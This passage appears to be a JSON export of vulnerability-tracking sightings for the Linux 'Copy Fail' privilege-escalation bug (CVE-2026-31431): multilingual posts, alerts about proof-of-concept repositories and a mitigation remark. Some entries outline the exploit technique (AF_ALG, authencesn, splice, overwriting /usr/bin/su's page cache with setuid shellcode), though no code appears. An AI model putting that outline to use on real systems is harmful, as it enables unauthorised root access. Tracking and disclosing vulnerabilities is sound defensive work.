conteneurs ! D\u00e9couvrez tout ce qu'il faut savoir et comment patcher ici : \ud83d\udc47\n\n...", "creation_timestamp": "2026-05-01T11:32:28.495710Z"}, {"uuid": "46225ead-daab-4abf-9196-6570f50f85a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/blablalinux.be/post/3mkrzrp4su22d", "content": "\ud83d\udea8 Alerte S\u00e9curit\u00e9 Linux ! La faille \"Copy Fail\" (CVE-2026-31431) permet de devenir root sur presque toutes les distribs depuis 2017 \ud83d\ude31\n\nC'est invisible et redoutable pour vos conteneurs ! D\u00e9couvrez tout ce qu'il faut savoir et comment patcher ici : \ud83d\udc47\n\n...", "creation_timestamp": "2026-05-01T11:32:29.026762Z"}, {"uuid": "b5b36f42-b227-4a1e-97a8-fe9034b9d968", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/infosecbriefly.bsky.social/post/3mks266nttb2a", "content": "The 'Copy Fail' vulnerability (CVE-2026-31431) in the Linux kernel allows unprivileged users to gain root access, affecting all major distributions since 2017.\n", "creation_timestamp": "2026-05-01T11:39:24.854315Z"}, {"uuid": "234c6b8c-378e-46b7-a08f-a760d878761a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/hack4career.com/post/3mks3m3vj2n2t", "content": "CVE-2026-31431: \"Copy Fail,\" the Nine-Year-Old Linux Bug Introduced in 2017 socradar.io/blog/cve-202...", "creation_timestamp": "2026-05-01T12:05:06.199890Z"}, {"uuid": "863102f2-0ce1-411f-9a77-5cc998c3181a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "c933734a-9be8-4142-889e-26e95c752803", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://vulnerability.circl.lu/comment/5e9c3f17-4570-484f-9113-fab5ca85b815", "content": "", "creation_timestamp": "2026-05-01T12:15:18.044824Z"}, {"uuid": "c680bdb8-8e4a-439a-b108-9dfcc1085457", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/WindoC/355137a084ec29501f5845e0bad88796", "content": "", "creation_timestamp": "2026-05-01T12:05:45.000000Z"}, {"uuid": "d43116be-edd7-4848-aa46-73efc3c95df4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/dglauche/748bef24e5bc35789c8906333804f567", "content": "", "creation_timestamp": "2026-05-01T12:05:10.000000Z"}, {"uuid": "3b0ce899-b940-4a86-b120-b9c0a04d307c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://gist.github.com/Carbon16/0e68c4df0e4c7f9c8bbe89d6c69d577c", "content": "", "creation_timestamp": "2026-05-01T11:48:56.000000Z"}, {"uuid": "6e599f43-d0fa-4445-8c95-3b05d0cc4cbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/linux.activitypub.awakari.com.ap.brid.gy/post/3mks4ex5hqoo2", "content": "Linux distributions worldwide targeted by the Copy Fail exploit An exploit for the \u201cCopy Fail\u201d security vulnerability (CVE-2026-31431) in the Linux kernel has been made public. The vulnerabilit...\n\n#Security #Copy #Fail #CVE-2026-31431 #Dirty #Pipe #Linux #linux [\u2026] \n\n[Original post on techzine.eu]", "creation_timestamp": "2026-05-01T12:19:02.782829Z"}, {"uuid": "77a1f247-0b46-4f5c-9321-7786b0eb40f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/arnoldmelm.bsky.social/post/3mks544kkz224", "content": "Eine neu entdeckte #Linux-Sicherheitsl\u00fccke namens #CopyFail (CVE-2026-31431) sorgt f\u00fcr Besorgnis. Ein Fehler im Linux-Kernel, der seit 2017 unentdeckt ist, erm\u00f6glicht es normalen Benutzern, mit einem winzigen Skript vollen Root-Zugriff zu erlangen. \n#Linux\nyoutu.be/_bckyC6w9f4?...", "creation_timestamp": "2026-05-01T12:31:56.020253Z"}, {"uuid": "4033bd31-eae7-4fd9-9bb8-6bda5ca284d8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/cybercod.bsky.social/post/3mks5jmwj2f2l", "content": "Solid fix for CVE-2026-31431! Blacklisting `algif_aead` via kernel arg with Ansible is a clean, idempotent approach. Great use of Linux fundamentals!", "creation_timestamp": "2026-05-01T12:39:29.340002Z"}, {"uuid": "487be742-be41-491d-991a-e29f12ebda2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82318", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a Linux-CopyFail-C-Version-CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a beatbeast007\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-01 11:54:38\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nClean C version of Copy Fail (CVE-2026-31431) - Linux Local Privilege Escalation exploit using AF_ALG + authencesn + splice primitive.  Overwrites the page cache of /usr/bin/su with a tiny setuid shellcode to gain root privileges.  Educational proof-of-concept only.\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-01T12:00:03.000000Z"}, {"uuid": "aa0a3593-4b16-46b5-b4a5-8b2ce1cab454", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82350", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a ExploitEoom\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-01 15:59:02\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCopyFail\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-01T16:00:05.000000Z"}, {"uuid": "481b3865-676e-48df-82b5-dc9067e1e4c1", "vulnerability_lookup_origin": "405284c2-e461-4670-8979-7fd2c9755a60", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2026-31431", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/ff00c791-06de-48b9-8f44-1f3913c1dae2", "content": "", "creation_timestamp": "2026-05-01T19:00:01.704647Z"}, {"uuid": "8be76965-8589-4856-8ca4-b0eeaa6b9493", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82365", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copyfail-deconstructed\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a bootsareme\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-01 18:59:25\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nEasy-to-understand version of CVE-2026-31431\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-01T19:00:04.000000Z"}, {"uuid": "5003280b-5beb-44b8-8ab6-139c8c6b4f1d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/82504", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a Gr-1m\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Go\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-02 15:54:28\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCopyfail (CVE-2026-31431) exp rewrite by Golang\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-02T16:00:04.000000Z"}, {"uuid": "d1ad4413-08de-4c2e-9354-32ded7911b46", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/pmloik.bsky.social/post/3mkymuhf3uq2z", "content": "Top 3 CVE for last 7 days:\nCVE-2026-31431: 481 interactions\nCVE-2026-41940: 74 interactions\nCVE-2026-3854: 57 interactions\n\n\nTop 3 CVE for yesterday:\nCVE-2026-31431: 26 interactions\nCVE-2026-41940: 6 interactions\nCVE-2026-5404: 4 interactions\n", "creation_timestamp": "2026-05-04T02:29:57.308285Z"}, {"uuid": "9c75d540-4bdb-46d7-bd73-3b9557dfc55e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/ctinow/249657", "content": "CISA Adds Actively Exploited Linux Root Access Bug CVE-2026-31431 to KEV\nhttps://ift.tt/tRdwIxP", "creation_timestamp": "2026-05-03T06:54:28.000000Z"}, {"uuid": "9516581a-be33-46dd-b6a7-1de1905e828e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/gabywald.bsky.social/post/3ml3qvmebu22r", "content": "\"Copy Fail (CVE-2026-31431) : Synth\u00e8se technique sur cette faille Linux\"\n\n#Faille #Linux #CopyFail #Explications #Correctifs ... \n\nwww.linuxtricks.fr/news/10-logi...", "creation_timestamp": "2026-05-05T08:20:10.711124Z"}, {"uuid": "03a5938d-0d0c-41d9-9f7f-328ddb074a21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/DgINMEwO-LQCHpIR5171X13X7Q7hKGhih-uOGzbTljCnFG0", "content": "", "creation_timestamp": "2026-05-01T03:00:14.000000Z"}, {"uuid": "0af7439c-0e8d-4462-9db0-553362622501", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82473", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a copyfailRecurrence\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a 2H-K\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a None\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-02 10:54:35\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCopy Fail (CVE-2026-31431) \u5185\u6838\u6f0f\u6d1e\u590d\u73b0\u73af\u5883\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-02T11:00:04.000000Z"}, {"uuid": "4ad53413-b3eb-4304-b655-1815202c703a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/thehackernews/8904", "content": "\u26a0\ufe0f A new #Linux flaw mirrors Dirty Pipe\u2014but adds cross-container impact.\n\n\u201cCopy Fail\u201d (CVE-2026-31431) lets any local user overwrite cached system files and run them as root. No race condition.\n\nWorks across major Linux distros since 2017.\n\n\ud83d\udd17 Read \u2192 https://thehackernews.com/2026/04/new-linux-copy-fail-vulnerability.html", "creation_timestamp": "2026-04-30T09:55:15.000000Z"}, {"uuid": "938e4195-244c-44c6-9ed1-e726e74ed076", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82582", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a attaattaatta\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Go\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-03 05:59:11\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-31431 golang hotfix\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-03T06:00:04.000000Z"}, {"uuid": "017a5007-f9a8-4df3-bce2-032f677749d5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://thehackernews.com/2026/05/cisa-adds-actively-exploited-linux-root.html", "content": "", "creation_timestamp": "2026-05-03T04:26:00.000000Z"}, {"uuid": "87ad578d-015c-4c7c-b34d-a8e09faef9ca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/rYfhm_004exykZ8do5dalE7YB53CRVnjuhduYoE7gKkXMgc", "content": "", "creation_timestamp": "2026-05-01T09:00:04.000000Z"}, {"uuid": "936b295f-c66b-47b7-ad5a-05cd573ce728", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/evdmPyDv_38pRllzy8Ta91lWQAIqoLwW5wEChicmrjO_C0k", "content": "", "creation_timestamp": "2026-05-01T07:00:13.000000Z"}, {"uuid": "3a9778bb-c5e3-44b1-8458-ea67c1a750d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/P45NJHmymloXtZI_QDhqedqg_rJijkJmCthR1UJzeSteIHM", "content": "", "creation_timestamp": "2026-04-30T23:00:10.000000Z"}, {"uuid": "5d1f76d1-95cc-4bea-829a-fae2e663a797", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/k5OTU-9lUzFKUTq8zqq2Ea-jY-aJMqpZsl5nZtaT5jx_Wu8", "content": "", "creation_timestamp": "2026-04-30T15:00:27.000000Z"}, {"uuid": "4bbbf6b1-fcab-4720-b070-a8fd0480fbff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/ilj7-w0C4NWXTAZYwiTR68v2Cg46brLVMoWECZr8IZK8Y9I", "content": "", "creation_timestamp": "2026-04-30T19:00:12.000000Z"}, {"uuid": "eb7831bd-4650-4e3a-ae15-c18660424314", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/yjUnQ6hKYXBxzaCr4Cr42UE0MHqi1VzU3UchLcz_NxtZwAY", "content": "", "creation_timestamp": "2026-04-30T09:00:04.000000Z"}, {"uuid": "a80de7b2-02c4-4be5-b658-17dbd67e7477", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/3tKSA63ykFsNCx7Ci_YM-GlAoFttSrYjQJCM_fsQcGoJpDo", "content": "", "creation_timestamp": "2026-04-30T15:00:06.000000Z"}, {"uuid": "9cac66a0-3dc7-4986-83ab-44dd3b4ed3ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/GithubRedTeam/82432", "content": "\ud83d\udea8 GitHub \u76d1\u63a7\u6d88\u606f\u63d0\u9192\n\n\ud83d\udea8 \u53d1\u73b0\u5173\u952e\u8bcd\uff1a #CVE-2026\n\n\ud83d\udce6 \u9879\u76ee\u540d\u79f0\uff1a CVE-2026-31431\n\ud83d\udc64 \u9879\u76ee\u4f5c\u8005\uff1a xd20111\n\ud83d\udee0 \u5f00\u53d1\u8bed\u8a00\uff1a Python\n\u2b50 Star\u6570\u91cf\uff1a 0  |  \ud83c\udf74 Fork\u6570\u91cf\uff1a 0\n\ud83d\udcc5 \u66f4\u65b0\u65f6\u95f4\uff1a 2026-05-02 05:57:47\n\n\ud83d\udcdd \u9879\u76ee\u63cf\u8ff0\uff1a\nCVE-2026-31431  Copy Fail - Local Privilege Escalation in the Linux kernel's authencesn cryptographic template via AF_ALG + splice()\n\n\ud83d\udd17 \u70b9\u51fb\u8bbf\u95ee\u9879\u76ee\u5730\u5740", "creation_timestamp": "2026-05-02T06:00:03.000000Z"}, {"uuid": "6f10cab0-ca90-4e7b-908d-4f1e1c6796dc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/ffbBuRmdSYe3lYPKfhQOupnrAX2e3gYPd5TMJ-uBERknFqY", "content": "", "creation_timestamp": "2026-04-30T11:00:14.000000Z"}, {"uuid": "feb3f3ce-0015-4fb4-b23f-74f8c2678219", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "Telegram/P5bUU6aFVi3_TImC6WDx24HeHf8RVUggO7fw0-2Q4WCtYm0", "content": "", "creation_timestamp": "2026-04-30T07:00:11.000000Z"}, {"uuid": "2a8cfaf3-4150-47dc-81fa-77f59a19ac34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://bsky.app/profile/undercode.bsky.social/post/3mkxzsxq6vc26", "content": "CVE-2026-31431: The 732-Byte Script That Renders All Linux Kernel Defenses Since 2017 Obsolete +\u00a0Video\n\nIntroduction: A recently disclosed local privilege escalation (LPE) vulnerability identified as CVE-2026-31431 and codenamed \"Copy Fail\" has sent shockwaves through the cybersecurity community.\u2026", "creation_timestamp": "2026-05-03T20:49:07.050052Z"}, {"uuid": "b3f63efb-faa5-42d5-b5f1-0f41c1eb63f4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2026-31431", "type": "seen", "source": "https://t.me/true_secator/8160", "content": "\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0440\u0430\u0441\u043a\u0440\u044b\u043b\u0438 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 LPE-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Linux, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u043e\u043c\u0443 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044e \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0440\u0430\u0432\u0430 root.\n\n\u041e\u043d\u0430 \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043a\u0430\u043a CVE-2026-31431 (CVSS: 7,8 \u0438 \u0431\u044b\u043b\u0430 \u043d\u0430\u0437\u0432\u0430\u043d\u0430 Xint.io \u0438 Theori - Copy Fail. \u041a\u0430\u043a \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438, \u043d\u0435\u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c \u043c\u043e\u0436\u0435\u0442 \u0437\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u0447\u0435\u0442\u044b\u0440\u0435 \u0443\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u043c\u044b\u0445 \u0431\u0430\u0439\u0442\u0430 \u0432 \u043a\u044d\u0448 \u0441\u0442\u0440\u0430\u043d\u0438\u0446 \u043b\u044e\u0431\u043e\u0433\u043e \u0447\u0438\u0442\u0430\u0435\u043c\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 Linux \u0434\u043b\u044f \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f root.\n\n\u0424\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043b\u043e\u0433\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u043e\u0448\u0438\u0431\u043a\u043e\u0439 \u0432 \u043a\u0440\u0438\u043f\u0442\u043e\u0433\u0440\u0430\u0444\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u044f\u0434\u0440\u0430 Linux, \u0430 \u0438\u043c\u0435\u043d\u043d\u043e \u0432 \u043c\u043e\u0434\u0443\u043b\u0435 algif_aead. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0432 \u043a\u043e\u043c\u043c\u0438\u0442\u0435 \u0438\u0441\u0445\u043e\u0434\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u043e\u0442 \u0430\u0432\u0433\u0443\u0441\u0442\u0430 2017 \u0433\u043e\u0434\u0430.\n\n\u0423\u0441\u043f\u0435\u0448\u043d\u0430\u044f \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043f\u0440\u043e\u0441\u0442\u043e\u043c\u0443 \u0441\u043a\u0440\u0438\u043f\u0442\u0443 \u043d\u0430 Python \u0440\u0430\u0437\u043c\u0435\u0440\u043e\u043c 732 \u0431\u0430\u0439\u0442\u0430 \u0440\u0435\u0434\u0430\u043a\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u043d\u044f\u0435\u043c\u044b\u0439 \u0444\u0430\u0439\u043b \u0441 \u0444\u043b\u0430\u0433\u043e\u043c setuid \u0438 \u043f\u043e\u043b\u0443\u0447\u0430\u0442\u044c \u043f\u0440\u0430\u0432\u0430 root \u043f\u0440\u0430\u043a\u0442\u0438\u0447\u0435\u0441\u043a\u0438 \u0432\u043e \u0432\u0441\u0435\u0445 \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432\u0430\u0445 Linux, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u044b\u0445 \u0441 2017 \u0433\u043e\u0434\u0430, \u0432\u043a\u043b\u044e\u0447\u0430\u044f Amazon Linux, RHEL, SUSE \u0438 Ubuntu. \n\n\u0421\u0430\u043c \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 \u043d\u0430 Python \u0440\u0435\u0430\u043b\u0438\u0437\u0443\u0435\u0442\u0441\u044f \u0447\u0435\u0440\u0435\u0437 \u0441\u043e\u043a\u0435\u0442 AF_ALG \u0432 \u0441\u0432\u044f\u0437\u043a\u0435 \u0441 authencesn(hmac(sha256),cbc(aes)) \u043f\u0443\u0442\u0435\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0438 \u0437\u0430\u043f\u0438\u0441\u0438 \u0432 \u043a\u044d\u0448\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u0439 \u043a\u043e\u043f\u0438\u0438 \u044f\u0434\u0440\u0430 /usr/bin/su \u0438 \u0432\u044b\u0437\u043e\u0432\u0430 execve(\"/usr/bin/su\") \u0434\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u0432\u043d\u0435\u0434\u0440\u0435\u043d\u043d\u043e\u0433\u043e \u0448\u0435\u043b\u043b\u043a\u043e\u0434\u0430 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u0435\u0433\u043e \u043e\u0442 \u0438\u043c\u0435\u043d\u0438 root.\n\n\u041d\u0435\u0441\u043c\u043e\u0442\u0440\u044f \u043d\u0430 \u0442\u043e, 